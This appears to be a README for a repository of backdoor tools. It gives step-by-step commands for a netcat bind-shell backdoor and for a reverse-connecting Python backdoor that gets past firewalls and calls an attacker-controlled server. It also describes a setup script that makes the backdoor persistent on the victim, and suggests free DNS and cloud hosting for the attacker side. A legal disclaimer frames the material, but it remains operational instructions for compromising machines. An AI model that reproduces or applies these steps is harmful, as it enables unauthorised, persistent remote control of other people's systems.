Any actions and or activities related to the material contained within this repository is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The author will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this repository to break the law.
Basic backdoor is the easiest backdoor that you could make.
The victim is just a server that redirects incoming messages into a shell and then sends back the shell output.
The victim IP can be found easly with nmap
.
- netcat (usually already installed)
# On the victim
./basic-backdoor/backdoor.sh
# On the attacker
nc $VICTIM-IP 8080
This advanced backdoor allows to bypass the firewall and to communicate outside subnetwork.
Now the victim is just a client, the attacker is the server. When the victim is connected to the attacker's server, he'll execute command provided by the attacker and then send it back its output.
You can configure PORT
and DNS
inside the files backdoor-client.py and backdoor-server.py.
You can use freenom to get a free DNS. You can use aws to get free server.
# On the victim for non-permanent backdoor
./advanced-backdoor/backdoor-client.py
# ⚠️ On the victim for "PERMANENT" backdoor
./advanced-backdoor/setup.sh
# On the attacker (where the DNS is pointing to)
pip3 install -r ./advanced-backdoor/requirements.txt
./advanced-backdoor/backdoor-server.py
➡️ Take time to understand how it's working, PR are welcomed